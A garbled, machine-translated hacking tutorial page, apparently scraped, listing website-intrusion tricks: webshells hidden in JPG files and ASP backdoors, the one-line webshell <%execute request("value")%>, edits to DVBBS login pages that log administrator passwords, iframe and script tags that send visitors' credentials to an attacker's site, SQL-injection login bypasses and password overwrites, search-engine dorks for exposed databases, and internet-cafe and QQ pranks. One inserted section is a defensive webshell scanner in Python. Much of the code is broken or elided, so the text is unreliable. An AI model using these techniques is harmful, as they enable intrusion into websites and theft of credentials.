SoFunction
Updated on 2025-04-10

Make you become an ASP * master

1. Name: How to make pictures ASP * (pictures can be displayed)
Create an asp file with the content <!--#i nclude file=""-->
Find a normal picture, insert a sentence * (such as Ice Fox's), use ultraedit to compile hex, insert it into the picture, for
After successful operation, you need to search <% and %> and turn it to 00 (do not replace your asp), and then add the beginning of the jpg file.
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval((#)+) </SCRIPT> 

2. Name: Prank the Internet Cafe
First use the Jingrui Internet Cafe auxiliary tool to get the username and password, then use computer management to connect to a machine, open telnet, connect, and open sharing,

Just copy a * to run it.

3. Name: Feel the charm of MD5
The usage of rainbowcrack first uses rtgen to generate the library "rtgen md5 byte 1 7 5 2400 40000 all"
1 and 7 represent the minimum and maximum length of the password
I'll add another method: / Online crack
Or go to http:///?category=01-3&;searck=on

4. Many times we do *s without killing, and we don’t need to know assembly. We can escape the autopsy by using the Beidou shelling program. There are also many shelling software. Everyone can shell the *s.

It is best to choose more unknown shelling software.

5. Name: Hidden insertion type ASP *
(1) Add the following content to the asp file where we want to do things
<%if request("action")="ok" then%> 
The shell code is inserted here, preferably a pony, and it needs to be encrypted.
<%end if%> 
When accessing, add ?action=ok to the asp file you are wiggling and slapping.
(2) Another method: add the following content to the asp file where we want to do things.
<% 
on error resume next 
strFileName = ("filer") 
set objStream = ("") 
 = 1 
 
 strFileName 
 (""),2 
%> 
When accessing, add ?filer=XXX after the asp file that is tampering with the problem.
XXX uploads a path for you locally such as c:
After uploading, there is ating, asp in the same folder as the asp that is doing tampering.
(3) The premise is to obtain system permissions,
Enter the next level of the website directory
mkdir s… 
copy  s…/ 
This antivirus software cannot be found
Just visit http://website/s…/

6. Tool/, this tool generates a super user on the computer. The user name is: hack, password 110. The user it creates cannot be seen under DOS or in Computer Management, and it cannot be deleted.

7. Name: QQ group script attack
Open the QQ dialogue, copy the message, and then
Save the following content as a .vbs file and run
Set WshShell= ("") 
"QQ Information Attack Script"
for i=1 to 20 
 1000 
"^v" 
 i 
 "%s" 
Next 

8. Search: Program production: Wan Peng If you have free application space, just upload the Asp Horse directly

9. Name: Thoroughly find the ASP * on your own site
(1) Use antivirus software
(2) Use FTP client software: click "Tools" -> "Compare Folders"
(3) Use asplist2: upload it to the site space and view the listing. Generally, ASP files with many functions are probably ASP *s.
(4) Use the tool Beyond Compare
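
A defender-side version of the checks in item 9, as an added example that is not part of the original page: it compares the site against a known-good baseline (the "Compare Folders" idea) and flags the script patterns this page shows, namely execute/eval fed from request input, a server-side script tag, and script markers inside image files. The extension lists, rule names and the sample site built in `demo()` are assumptions constructed for illustration.

```python
import hashlib, re, tempfile
from pathlib import Path

# Assumed extension lists: script-mapped types mentioned on this page, plus common images.
SCRIPT_EXT = {".asp", ".asa", ".cer", ".cdx"}
IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png"}
# Heuristic rules taken from the snippets on this page; not a complete signature set.
RULES = {
    "execute/eval fed from request": re.compile(rb"\b(execute|eval)\b[\s(]*request\b", re.I),
    "server-side <script runat=server>": re.compile(rb"<script[^>]*runat\s*=\s*[\"']?server", re.I),
}

def snapshot(root):
    """Map relative path -> SHA-256 for every file under root (the known-good baseline)."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def scan(root, baseline):
    """Return sorted (path, reason) findings for scripts and images under root."""
    findings = []
    for rel, digest in snapshot(root).items():
        data = (Path(root) / rel).read_bytes()
        ext = Path(rel).suffix.lower()
        if ext in SCRIPT_EXT:
            if rel not in baseline:
                findings.append((rel, "script not in baseline"))
            elif baseline[rel] != digest:
                findings.append((rel, "script changed since baseline"))
            findings += [(rel, name) for name, rx in RULES.items() if rx.search(data)]
        elif ext in IMAGE_EXT:  # images should never carry server-side script markers
            if b"<%" in data or RULES["server-side <script runat=server>"].search(data):
                findings.append((rel, "script marker inside image"))
    return sorted(findings)

def demo():
    """Constructed sample site: a clean baseline, then three tampered or new files."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.asp").write_bytes(b'<% Response.Write "hello" %>')
        (root / "logo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed image bytes")
        baseline = snapshot(root)
        (root / "index.asp").write_bytes(b'<% Response.Write "hello" %><%execute request("value")%>')
        (root / "logo.jpg").write_bytes(b"\xff\xd8\xff\xe0<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>")
        (root / "new.asp").write_bytes(b'<% Response.Write "x" %>')
        return scan(root, baseline)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

The pattern rules are heuristics and can fire on legitimate code or on binary image data, so the baseline comparison is the stronger signal; take the snapshot from a trusted copy of the site, not from the live server.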

10. Name: Expand the idea of getting a DVBBS account "One person's Bible" animation
(1) In the past, after obtaining the webshell, I wanted to enter the background of DVBBS and wanted the administrator's password. This is how.
Old method:
Modify admin_login.asp to get the plaintext DVBBS background password
After the line "username=trim(replace(request("username")
Dim fsoObject 
Dim tsObject 
Set fsoObject = ("") 
set tsObject = (("")) 
 CStr(request("password")) 
Set fsoObject = Nothing 
Set tsObject = Nothing 
As long as the administrator logs into the background, it will be generated in the directory.
(2) Case "login_chk" below:
on error resume next 
Dim rain 
set rain=("") 
=2 
="gb2312" 

 
 ("") 
 now&request("username")&"text:"&request("password")&chr(10) 
 (""),2 
 
set rain=nothing 
This will obtain the login time, username and password of all logged in.
(3) If you have your own website or another webshell (strongly recommended):
You can create a directory laner, and create an empty and following code inside:
<%if request("n")<>"" and request("p")<>"" then 
on error resume next 
Dim rain 
set rain=("") 
=2 
="gb2312" 

 
 ("") 
 now&"Name:"&request("n")&"Password:"&request("p")&chr(10) 
 (""),2 
 
set rain=nothing 
end if%> 

11. Name: Use QQ online to catch pigeons and broilers
Generate the QQ online status, change the address inside to the * address, and send it to the forum
Insert a sentence there:
"<scriptsrc=/laner/?n="&request("username") 

&""&"&p="&request("password")&"></script>" 
"<iframesrc=http://yourwebsite/laner/?n="&request("username") 

&""&"&p="&request("password")&"></iframe>" 
As a result, all logged in will obediently send your name and password to you

12. Animation name: There are many loopholes in the entire media site program.
Vulnerability Program: Media China Full Site Program (First Edition)
Official website:/
Vulnerability: %5c (burst library) Upload, Injection
Upload page: down1/

13. Name: Free call + MSH command line tool
http:/// Open the home page, click on the seating corner, Free DownLoad, download to local, install,
After running, it will prompt that the area code of your region is being searched for. Since calls are international long distance, register an account and get 100 cents; the domestic rate is 0.01/min, so you will have 100 minutes to play for free. It's an account.
It should be noted that the landline telephone and Xiaolingtong form is 0086521123456; 521 was originally 0521, and the leading zero must be omitted. Mobile phone numbers are handled the same way.

14. Name: New vulnerability in Bo-Blog
http://website/?job=../admin/ban
Save the part of "forbidden search" in it, change the address inside it, insert a * horse

16. Program: Hongda Enterprise’s entire website upload vulnerability
Official homepage: http:///
Vulnerability page:/cx/ (Upload vulnerability)

17. In the password change, add or=or to the username and password

18. Name: bbsxp5.16 background gets webshell
bbsxp5.16 filters file uploads with asp, asp, cdx, cer, and extensions. Even if you add the upload type to the basic settings, it is not OK and it is prohibited.

To modify the data backup data name, we can save this web page locally and upload the source code.

19. Name: JHACKJ 2005 latest classic tutorial
Download and take a look, it's good, it's available on all major websites

20. Name: Save effort to invade Korean broiler
In Ah D's scan injection point item, open this: /advanced_search?hl=zh-CN
This is an advanced search term, and you can write keywords at will. Here I write asp?name= set to display 100 items per page.
Language selection Korean. Search, many sa.

21. Name: cracked by any Internet cafe management system
Select smart ABC, then enter vv, take two steps back, press the delete key to delete the two vvs you just entered
Finally press the Enter key

22. Name: Cracking the code of QQ space inserting web *
Tencent has now blocked a lot of QQ space codes, just like before <iframe src="* address" name="lcx" width="0"

height="0" frameborder="0"></iframe>The code for inserting the web * has long been blocked.
The code for breaking through disable is as follows:
<div id=DI><img src="javascript :=\<iframe src=* address width=190 height=190

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\" 

style=display:none></div> 

Finally, Kara is a summary of OK
1. Upload vulnerability [No more talk about]
PS: If you see "Select the file you want to upload [Re-upload]" or "Please log in and use it" appear, 80% of them will have a vulnerability!
Sometimes uploading may not be successful, because cookies are different. We need to use WSockExpert to obtain cookies and then upload them with DOMAIN.

2. Injecting vulnerabilities [No more talk]
PS: About MD5 passwords. Sometimes it is not easy for us to run them out. If it is a [SQL database], then we can use the following command:
http://inject URL; update admin set password=\new MD5 password\ where password=\old MD5 password\--

[admin is the table name.]


3. Side note, that is, cross-site.
When we invade a certain site, the site may be solid and impeccable. We can find a site on the same server as that site and then use it, with power-elevation, sniffing and other methods, to invade the site we want to invade. There is a difficulty here: the absolute paths on some servers are encrypted, so it depends on our ability.


4. Blast library: Change / in the middle of the secondary directory to %5c
EY:/otherweb/dz/bgs/?BigClassName=Scope of Responsibilities&BigClassType=1
If you can see: \E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\ is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
This is the database. When downloading, just use FLASHGET to .MDB format.


5.\or\=\or\This is a famous saying that can connect to SQL. You can directly enter the background. I collected it. Similar ones:
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a 

6. Social Engineering. We all know this. Just guess.
 EY:/waishi/admin 
admin waishi 

7. Write to the ASP format database. It is just a sentence * [<%execute request("value")%> ], which is commonly used in the message book.
EY: /ebook/db/[This is an ASP format database], write another sentence

*


8. Source code utilization: Some websites use source code downloaded online. Some webmasters are very naive and do not change anything.
EY:/xiaoyoulu/ 
This site uses: Outstanding Alumni Record, I have downloaded the source code,
Default database/webshell path: databaseliangu_data.mdb Backend management: adm_login.asp Password and username are both admin


9. Default database/webshell path utilization: There are many such websites/wEBSHELL that benefit others.
/Databackup/ 
/bbs/Databackup/ 
/bbs/Data/ 
/data/ 
/bbs/ 

/bbs/ 
/bbs/ 
/bbs/ 
/bbs/ 
Tools: Website Hunter Digging Chicken
EY:http:///bbs/Databackup/ 

10. View directory method: Some websites can disconnect the directory, and you can ask the directory.
EY:http:///shop/admin/ 
/babyfox/admin/%23bb%23dedsed2s/ 
In this way, we can find the database, so I don’t need to teach you how to download it.

11. Tool overflow:.asp?NewsID=/?id=18.asp?id=[This method can obtain a large amount of WEBSHELL]

12. Search engine utilization:

(1).inurl:flasher_list.asp Default database:database/ backend/manager/
(2). Find the website's management backend address:
site::Management
site::Management <There are many keywords, please look for it yourself>
site::login 
(3). Find access database, mssql, mysql connection files
allinurl:bbsdata 
filetype:mdbinurl:database 
filetype:incconn 
inurl:datafiletype:mdb 
My Lord will not do it anymore. . Do it yourself. .

13. Deception: Change your ID to the administrator, and change the MD5 password to his. You can use the Guilin Veteran Tool to modify COOKIE.

I won't talk about this more


14. Take advantage of common vulnerabilities: Rudong.com BBS
EY:/bbs/ 
You can first use the :dvbbs permission enhancement tool to make yourself a front-end administrator.
Then use the Dynamic Net Fixed Top Sticker Tool, find a Fixed Top Sticker, and then obtain COOKIES; you have to do this yourself. We can use WSockExpert to obtain Cookies/NC Package
I won’t do this anymore. There are many online tutorials, so I will take a look at it next.
Tools: dvbbs permission enhancement tool, dynamic network fixed top sticker tool

15. There are still some old loopholes. For example, IIS3, 4's view source code, 5's delete
I won’t talk about CGI, some old holes in PHP. . Too old. No big use.